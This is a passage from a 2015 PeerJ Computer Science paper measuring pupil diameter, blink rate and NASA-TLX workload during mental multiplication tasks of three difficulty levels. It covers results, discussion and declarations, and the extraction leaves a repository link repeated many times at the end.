baseline period (3.6–4.0 s) of each trial was subtracted from each trial to accommodate for any possible shifts or drifts. The mean pupil diameter change (MPDC) for each participant was then obtained by averaging all trials per level of difficulty. Similarly, the mean pupil diameter (MPD) for each participant was obtained but then without subtracting the mean pupil diameter of the baseline period. The MPDCR was calculated for each participant as the average velocity (mm/s) or change in MPD between two points in time. In order to compare the three difficulty levels, the MPD and MPDC were analyzed at eight fixed points in time from the multiplier and calculation periods (i.e., P1 = 6.5 s, P2 = 7.5 s, P3 = 9.0 s, P4 = 10.5 s, P5 = 12.0 s, P6 = 13.5 s, P7 = 15.0 s, P8 = 16.5 s). The MPDCR was assessed across the seven interim periods. In addition to these analyses, the mean blink rate (MBR) for two different periods in time was calculated. That is, a distinction was made between low mental demands (i.e., from the beginning of the accommodation period until the presentation of the multiplier; i.e., from 0 to 6.5 s) and high mental demands (i.e., from the presentation of the multiplier until the end of the calculation period; i.e., from 6.5 to 17.5 s). A blink was defined as the moment that the eye opening dropped below 75% of the mean eyelid opening of that trial (see Fig. S1). Statistical analyses The pupil diameter measures (MPD, MPDC, and MPDCR), the blink rates (MBR), and the results of the NASA-TLX were analyzed with paired t-tests between the three levels Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 7/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16/supp-2 http://dx.doi.org/10.7717/peerj-cs.16/supp-2 http://dx.doi.org/10.7717/peerj-cs.16 M u lti p lic a n d M u lti p lie r (1) (2) (3) (4) (5) (6) (7) Time (s) 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 M P D ( m m ) 3.6 3.7 3.8 3.9 4 4.1 4.2 4.3 Level 1 Level 2 Level 3 P1 P2 P3 P4 P5 P6 P7 P8 Figure 4 Mean pupil diameter (MPD) during the mental multiplication task for the three levels of difficulty. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an “XX” during the remainder of the trial. (i.e., Level 2 vs. 1, Level 3 vs. 1, and Level 3 vs. 2). Additionally, Pearson’s r correlation coefficients were obtained between the MPDC, the NASA-TLX, and the percentage of incorrect responses. For all analyses, a Bonferroni correction was applied. Accordingly, we set the significance level to 0.05/3 (∼0.0167). Cohen’s dz effect size (see Eq. (1)) was calculated to determine at which points in time the differences in MPDC between the three levels of difficulty were largest. In Eq. (1), M and SD are the mean and standard deviation of the vector of data points, respectively, r is the Pearson correlation coefficient between the two vectors of data points, t is the t-statistic of a paired t-test, and N is the sample size (i.e., the number of pairs, which was either 29 or 30). dz = Mi − Mj SD2i + SD 2 j − 2 ∗ r ∗ SDi ∗ SDj = t √ N . (1) RESULTS Mean pupil diameter (MPD) The MPD during the mental multiplication task is shown in Fig. 4. It can be seen that at all points in time, the MPD was higher for the higher levels of difficulty. The pattern of the MPD was similar for all levels during the first ten seconds. Figure also shows the results for the period 6.5–17.5 s, split into seven periods with eight points. The means and standard deviations of the MPD for the eight points in time and the three levels of difficulty are shown in Table 2, together with the effect sizes (dz ) and the p-values of the pairwise comparisons. The results confirm that the MPD was significantly higher for the more difficult levels at all points in time. Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 8/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Table 2 Mean pupil diameter (MPD), mean pupil diameter change (MPDC), mean pupil diameter change rate (MPDCR), NASA-TLX, and mean blink rate (MBR), per level of difficulty of the multiplications. The means (M) and standard deviations (SD) are shown per level of difficulty of the multiplications. P1–P8 refers to the eight points in time, while (1)–(7) refers to the seven periods. Statistically significant differences are indicated in boldface. N = 30 for the NASA-TLX for all three levels. M(SD) p-value (dz ) Level 1 (N = 30) Level 2 (N = 29) Level 3 (N = 30) Level 2 vs. 1 (df = 28) Level 3 vs. 1 (df = 29) Level 3 vs. 2 (df = 28) MPD (mm) P1 3.748 (0.456) 3.804 (0.467) 3.873 (0.490) 0.334 (0.18) 0.001 (0.71) 0.026 (0.44) P2 3.796 (0.480) 3.865 (0.486) 3.949 (0.516) 0.119 (0.30) <0.001 (0.84) 0.009 (0.53) P3 3.904 (0.470) 3.979 (0.481) 4.051 (0.531) 0.107 (0.31) <0.001 (0.79) 0.036 (0.41) P4 3.891 (0.456) 4.003 (0.478) 4.113 (0.522) 0.037 (0.41) <0.001 (1.04) 0.007 (0.54) P5 3.827 (0.429) 3.948 (0.488) 4.136 (0.521) 0.017 (0.47) <0.001 (1.47) <0.001 (0.84) P6 3.752 (0.451) 3.894 (0.490) 4.122 (0.518) 0.017 (0.47) <0.001 (1.57) <0.001 (0.88) P7 3.709 (0.427) 3.815 (0.474) 4.130 (0.500) 0.051 (0.38) <0.001 (1.73) <0.001 (1.26) P8 3.676 (0.436) 3.781 (0.460) 4.108 (0.493) 0.064 (0.36) <0.001 (1.94) <0.001 (1.21) MPDC (mm) P1 −0.118 (0.087) −0.114 (0.115) −0.093 (0.085) 0.837 (0.04) 0.158 (0.26) 0.424 (0.15) P2 −0.069 (0.094) −0.052 (0.118) −0.017 (0.120) 0.310 (0.19) 0.016 (0.47) 0.218 (0.23) P3 0.038 (0.148) 0.061 (0.148) 0.084 (0.152) 0.297 (0.20) 0.107 (0.30) 0.452 (0.14) P4 0.026 (0.179) 0.086 (0.149) 0.147 (0.171) 0.039 (0.40) 0.001 (0.65) 0.093 (0.32) P5 −0.038 (0.204) 0.031 (0.164) 0.169 (0.205) 0.013 (0.49) <0.001 (1.13) <0.001 (0.74) P6 −0.113 (0.196) −0.024 (0.193) 0.155 (0.228) 0.012 (0.50) <0.001 (1.50) <0.001 (0.86) P7 −0.156 (0.186) −0.102 (0.207) 0.164 (0.226) 0.044 (0.39) <0.001 (1.94) <0.001 (1.35) P8 −0.190 (0.179) −0.136 (0.208) 0.143 (0.248) 0.115 (0.30) <0.001 (1.95) <0.001 (1.20) MPDCR (mm/s) (1) 0.048 (0.087) 0.062 (0.079) 0.076 (0.112) 0.210 (0.24) 0.068 (0.35) 0.463 (0.14) (2) 0.072 (0.080) 0.076 (0.069) 0.067 (0.081) 0.696 (0.07) 0.765 (−0.06) 0.698 (−0.07) (3) −0.008 (0.078) 0.016 (0.070) 0.042 (0.055) 0.094 (0.32) 0.002 (0.61) 0.088 (0.33) (4) −0.043 (0.052) −0.037 (0.057) 0.015 (0.052) 0.606 (0.10) <0.001 (0.99) <0.001 (0.74) (5) −0.050 (0.060) −0.036 (0.059) −0.009 (0.067) 0.514 (0.12) 0.021 (0.45) 0.052 (0.38) (6) −0.029 (0.051) −0.053 (0.053) 0.006 (0.060) 0.098 (−0.32) 0.015 (0.47) <0.001 (0.78) (7) −0.022 (0.052) −0.022 (0.062) −0.014 (0.051) 0.827 (−0.04) 0.514 (0.12) 0.372 (0.17) NASA-TLX (%) Total 21 (13) 31 (13) 49 (14) <0.001 (0.86) <0.001 (1.91) <0.001 (1.48) Mental 34 (21) 47 (17) 70 (17) 0.002 (0.63) <0.001 (1.39) <0.001 (1.51) Physical 16 (17) 19 (19) 20 (20) 0.045 (0.38) 0.118 (0.29) 0.707 (0.07) Temporal 19 (15) 29 (18) 53 (23) 0.004 (0.56) <0.001 (1.41) <0.001 (1.26) Performance 10 (12) 21 (17) 40 (23) 0.002 (0.62) <0.001 (1.45) <0.001 (0.91) Effort 28 (19) 43 (17) 64 (22) <0.001 (0.75) <0.001 (1.35) <0.001 (1.15) Frustration 18 (17) 27 (24) 45 (29) 0.005 (0.56) <0.001 (1.21) <0.001 (0.85) MBR (blinks/s) (0.0–6.5 s) 0.262 (0.165) 0.258 (0.168) 0.303 (0.216) 0.748 (0.06) 0.203 (0.24) 0.265 (0.21) (6.5–17.5 s) 0.218 (0.187) 0.212 (0.175) 0.265 (0.210) 0.861 (0.03) 0.078 (0.33) 0.023 (0.44) Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 9/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Figure 5 Mean pupil diameter change (MPDC) during the mental multiplication task, for the three levels of difficulty. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an “XX” during the remainder of the trial. Mean pupil diameter change (MPDC) Figure 5 shows the MPDC as a function of the level of difficulty. As mentioned above, this measure takes into account the shift of the baseline by subtracting the mean of the baseline period of each trial. The difference between the three pupillary responses during the calculation period can now be seen more clearly as compared to the MPD. Again, the multiplier and calculation periods were split into seven periods by eight points. The results of the analysis of the MPDC at the eight points in time and the three levels of difficulty are shown in Table 2. A significant difference occurred at Points 4–8. The effect size estimate Cohen’s dz was also calculated for the MPDC between pairs of difficulty levels for each point in time (see Fig. 6). It can be seen that large effect sizes arose after approximately 11 s since the start of the trial, especially between Levels 1 and 3. Mean pupil diameter change rate (MPDCR) Figure 7 shows the MPDCR as a function of the difficulty level for the seven periods. A positive value indicates overall pupil dilation during that period and a negative value means overall contraction of the pupil diameter. In the first two periods, the diameter increased with approximately equal velocity for the three levels. During the other periods, the velocities decreased and became negative. Significant differences were found between the three conditions (see also Table 2). Self-reported workload (NASA-TLX) The results of the NASA-TLX questionnaire are shown in Fig. 8. For almost all items, the TLX score was significantly higher for the more difficult multiplications (see also Table 2). Only the subjective physical workload did not differ significantly between the levels of difficulty. Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 10/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Figure 6 Cohen’s dz for the mean pupil diameter change (MPDC) between pairs of levels of diffi- culty. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an “XX” during the remainder of the trial. Figure 7 Mean pupil diameter change rate (MPDCR), for the three levels of difficulty and for seven periods in time during the presentation of the multiplier and the calculation period. The asterisks indicate statistically significant differences between the levels of difficulty. Pupil diameter of correct versus incorrect responses The percentages of correct responses for Levels 1, 2, and 3 were respectively 94.7%, 92.9%, and 66.4% when selecting all 450 trials per level. When considering only those trials which passed the data filtering (see section ‘Data processing’), the percentages of correct responses for Levels 1, 2, and 3 were respectively 94.2% (371 of 394 trials), 93.8% (360 of 384 trials), and 69.2% (240 of 347 trials). Figure 9 shows the MPD for Level 3 separated into correct and incorrect responses. Too few incorrect answers were given for Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 11/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Figure 8 Results of the NASA-TLX questionnaire, for the three levels of difficulty. The asterisks indicate statistically significant differences between the levels of difficulty. Figure 9 Mean pupil diameter (MPD) during the mental multiplication task for the third level of difficulty. A distinction is made between correct and incorrect responses. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an “XX” during the remainder of the trial. the other two levels and the results for these levels are therefore not reported. There were no significant differences between the MPD for correct and incorrect responses (Table S2). Blink rate Table 2 shows that the MBR of Level 3 was higher, but not significantly so, than the MBR of Levels 1 and 2. However, for each level of difficulty, the MBR was higher during periods with low mental demands (0–6.5 s) than during higher mental demands (6.5–17.5 s). Figure 10 illustrates the cumulative number of blinks as a function of time. It can be seen Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 12/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16/supp-2 http://dx.doi.org/10.7717/peerj-cs.16/supp-2 http://dx.doi.org/10.7717/peerj-cs.16 Figure 10 Mean cumulative number of blinks during the mental multiplication task for the three levels of difficulty. that participants were likely to blink at distinct moments in time, namely right after the start of the trial (∼0.5 s), right after the presentation of the multiplicand (∼4.5 s), and after the presentation of the multiplier (∼8.0 s). Correlations between MPDC, NASA-TLX, and proportion of incorrect responses The results of the correlation analyses between the MPDC, NASA-TLX, and proportion of incorrect responses are shown in Table 3. For the MPDC and NASA-TLX, the table shows overall positive correlations, for the eight points in time and for the three different levels of difficulty. Between the MPDC and the percentage of incorrect responses, three statistically significant positive correlation coefficients were observed at Points 1 and 2. Furthermore, Table 3 shows that people who experienced higher subjective workload (i.e., a higher NASA-TLX score) generally gave more incorrect responses. DISCUSSION Pupil diameter results The results showed that the MPD was higher for the higher levels of difficulty at all eight points of the calculation period, with Points 7 and 8 exhibiting the largest differences. The MPD findings demonstrate that the baseline of the pupil diameter can shift during mental activity. If the pupil had been given more time to recover from the previous trial by increasing the length of the accommodation period, the difference of the MPD between the three levels of difficulty in the first period would probably have been smaller. A remarkable finding is the behavior of the MPD during the first 2.5 s of the accommodation period. Where a clear decline from the start or a horizontal line might be expected, the MPD starts to decline only after about 2.5 s. This unexpected finding may have been caused by the fact that participants looked away from the center of the Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 13/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Table 3 Pearson’s correlations (r) between the mean pupil diameter change (MPDC), percentage of incorrect responses, and the overall NASA-TLX scores, for the three levels of difficulty. Statistically significant correlations are indicated in boldface. Level 1 Level 2 Level 3 Mean of levels 1–3 r (p-value) r (p-value) r (p-value) r (p-value) MPDC vs. overall NASA-TLX P1 −0.02 (0.899) 0.20 (0.310) 0.20 (0.283) 0.33 (0.072) P2 −0.22 (0.239) 0.29 (0.130) 0.09 (0.644) 0.17 (0.376) P3 −0.15 (0.523) 0.04 (0.818) 0.01 (0.978) 0.01 (0.965) P4 0.09 (0.435) 0.07 (0.733) 0.04 (0.833) 0.17 (0.365) P5 0.11 (0.641) 0.11 (0.554) 0.02 (0.925) 0.09 (0.654) P6 0.05 (0.550) 0.20 (0.307) −0.01 (0.952) 0.09 (0.637) P7 0.05 (0.813) 0.20 (0.290) 0.17 (0.363) 0.14 (0.469) P8 −0.00 (0.998) 0.26 (0.176) 0.16 (0.385) 0.18 (0.349) MPDC vs. % incorrect responses P1 0.34 (0.063) 0.44 (0.017) 0.35 (0.061) 0.64 (<0.001) P2 0.17 (0.371) 0.51 (0.005) 0.30 (0.110) 0.59 (0.001) P3 0.03 (0.882) 0.26 (0.180) 0.11 (0.567) 0.22 (0.244) P4 0.23 (0.219) 0.25 (0.183) 0.16 (0.385) 0.36 (0.051) P5 0.16 (0.397) 0.16 (0.409) 0.06 (0.749) 0.25 (0.179) P6 0.03 (0.882) 0.21 (0.285) 0.04 (0.847) 0.16 (0.396) P7 −0.00 (0.995) 0.32 (0.090) 0.14 (0.459) 0.28 (0.137) P8 0.04 (0.838) 0.25 (0.193) 0.14 (0.454) 0.24 (0.197) Overall NASA-TLX vs. % incorrect responses 0.57 (0.001) 0.35 (0.056) 0.53 (0.002) 0.58 (<0.001) screen when their outcome to the multiplication had to be entered. Although the responses were not given during the accommodation period, the fluctuation could be an aftereffect because the trials came in relatively quick succession. During the presentation of the multiplicand and the pause (4–6.5 s) the MPD decreased further, at a slower pace however, which seems to indicate memory load (cf. Kahneman & Beatty, 1966). A small increase of the pupil diameter after the presentation of the first number was observed by Ahern (1978) and Klingner (2010). The MPDC has the advantage compared to MPD that it corrects for fluctuations in the baseline pupil diameter, and hence compensates for any structural temporal trends that might exist. The use of MPDC is appropriate as compared to other types of measures such as percent dilation, because as pointed out by Beatty & Lucero-Wagoner (2000), “the extent of the pupillary dilation evoked by cognitive processing is independent of baseline pupillary diameter over a wide range of baseline values.” (p. 148). What is notable in the MPDC results (Fig. 5) is that the pupillary behavior between the three difficulty levels was highly similar during the first few seconds after the presentation of the multiplier (6.5–9 s). This might be due to the strategy that the participants used. One can imagine that the first step in each multiplication, regardless of its difficulty, is similar. For example, the Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 14/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 first step for many people of the Level 1 multiplication 7 × 14 would probably be 7 × 10. This is comparable to the first step of the Level 3 multiplication 14 × 18, which would then be 14 × 10. These observations are in line with the TEPRs obtained by Ahern (1978), who found a similar response between the three levels of difficulty at the beginning of the calculation. The MPDC during the other periods was found to differ significantly between the three levels, particularly when Levels 1 and 2 were compared to Level 3. The results of the MPDCR illustrate that the effect sizes are smaller when compared to the results of the MPDC measure. Presumably, the MPDCR is less sensitive to changes in mental workload because it represents second-to-second changes in pupil diameter rather than the actual pupil diameter itself (either absolutely as in the MPD, or relative to a baseline as in the MPDC). As with any first-order derivative of a signal, the MPDCR might be more sensitive to noise and unsystematic moment-to-moment fluctuations in pupil diameter. Nonetheless, the MPDCR does provide a clear indication of when the muscles of the pupil respond, and hence when the mental workload increases or decreases. An interesting question related to Fig. 9 showing the trials with the correct versus incorrect responses is: Were the participants really trying to complete the task or did they give up on the task because it was too difficult? If the latter were the case, one would expect an early decline of the MPD. But the opposite is true, instead. A small increase of the MPD was measured, suggesting that the participants were trying hard to complete the task until the time was up. Self-reported workload (NASA-TLX) According to the results of the NASA-TLX questionnaire, the classification of the arithmetic tasks was done properly, since a statistically significant difference was found in the subjective mental workload across all three levels. The large contrast between the subjective mental and physical workload underlines that the task was predominantly mentally rather than physically demanding. Not to be overlooked are the roles of the subjective temporal demand and frustration. Looking at the increase of the MPD of the incorrect responses after 12 s for Level 3 (Fig. 9), it is plausible that, although the results were not statistically significant, this increase was caused by the time pressure of the task or the anxiety or frustration of not having solved the multiplication yet, instead of increased task demands. Blink rate The relation between mental workload and blink rate has been unclear in the literature (e.g., Kramer, 1990; Marquart, Cabrall & De Winter, 2015; Recarte et al., 2008). The results in the present study show that the MBR was slightly higher for Level 3 than for Levels 1 and 2. Contrastingly, the MBR was higher during the low mental demand period (0–6.5 s) than during the high demand period (6.5–17.5). The temporal analysis (Fig. 10) indicated that people blinked particularly at those moments when the visual demand was reduced, such as right after the start of the task and right after the presentation of the multiplier. In summary, consistent with prior research, the relationship between mental workload Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 15/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 and blink rate is complex, and it appears that blink rate is governed not only by mental demands, but also by visual demands (see also Marquart, Cabrall & De Winter, 2015). Correlations between MPDC, NASA-TLX, and proportion of incorrect responses Moderate to strong correlations were found between the MPDC and the proportion of incorrect responses. A similar but weaker effect was obtained between the MPDC and the NASA-TLX. Thus, the MPDC was higher for participants who gave more incorrect responses and who reported a higher workload in the NASA-TLX. Negative correlations between the pupil diameter and the proportion of correct responses were also found by Ahern (1978), Payne, Parry & Harasymiw (1968) and Recarte et al. (2008). These findings could be useful for determining the feasibility of using the pupil diameter in human-machine applications such as adaptive automation, which is “an approach to automation design where tasks are dynamically allocated between the human operator and computer systems” (Byrne & Parasuraman, 1996, p. 249). Conclusions and recommendations It is concluded that the results of Ahern (1978) and Klingner (2010) have been accurately replicated with the SmartEye DR120 remote eye tracker. The Cohen dz effect size between the MPDC of Level 1 and Level 3 was 1.95 at maximum (at Point 8), which was about the same (dz = 1.91) as for the NASA-TLX overall score. This finding demonstrates that pupil diameter measurements can be just as valid as the NASA-TLX. In our research, an attempt was made to provide more insight into the individual differences of TEPRs by means of a correlation analysis. Results showed a few moderate to strong correlations at the beginning of the calculation period between the MPDC and the NASA-TLX, on the one hand, and the percentage of incorrect responses, on the other. Thus, it seems possible to assess workload by tracking the pupil diameter. However, the validity of pupil diameter measurements may need improvement before it could be implemented in practice. Future research could focus on improving signal analysis techniques that filter out effects other than mental workload, such as the light reflex. It is challenging to enhance the applicability of pupillometry towards tasks that require fixation on different types of targets. Janisse (1977) previously concluded that research that uses pictorial stimuli should “be interpreted with caution, and perhaps be discounted.” (p. 77). One possible way to use the pupil diameter in visually complex tasks might be to correct in real time for the amount of light that enters the eye. Janisse proposed such approach as early as 1977: “The simultaneous monitoring of pupil size and eye movements (points of focus) as subjects view pictorial stimuli might allow one to mathematically ‘correct’ pupil size as a function of the brightness of the point on which the subject’s gaze is falling at a given time.” (p. 169). Because modern remote eye trackers measure gaze direction and pupil diameter simultaneously, such approach becomes within practical reach, as also discussed by Klingner (2010). For further reading into approaches of pupillometry in complex visual environments, see Palinko & Kun (2011; a driving simulator), and Klingner (2010; visual search and map reading). Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 16/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Additionally, validity could be improved by combining pupillometry with other physiological measures (e.g., Haapalainen et al., 2010; Just, Carpenter & Miyake, 2003; Kahneman et al., 1969; Satterthwaite et al., 2007; Van der Molen et al., 1989). For example, Haapalainen et al. (2010) used an electrocardiogram (ECG)-enabled armband, a remote eye tracker, and a wireless electroencephalogram (EEG) headset, to collect various physiological signals simultaneously. The authors concluded that the heat flux and heart rate variability in combination provided a classification accuracy of over 80% between conditions of low and high mental workload. In this study, the pupil diameter did not perform strongly as a classifier (57%), presumably due to data loss of the eye tracker. A primary advantage of pupillometry in such multivariate applications is that the pupil diameter reacts rapidly to changes in task conditions (cf. Fig. 5), while measures such as heat flux, galvanic skin response, or heart rate have considerably longer time constants. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Gerhard Marquart conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Joost de Winter conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The research was approved by the Human Research Ethics Committee (HREC) of the Delft University of Technology (TU Delft). (‘Workload Assessment for Mental Arithmetic Tasks using the Task-Evoked Pupillary Response: January 29, 2015). Data Availability The following information was supplied regarding the deposition of related data: The Experimenter software and analysis scripts are available as Supplemental Files but as the raw data files are quite large, they are currently hosted at: http://repository.tudelft.nl/ assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary Material Gerhard Marquart.zip. Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 17/20 https://peerj.com/computer-science/ http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip 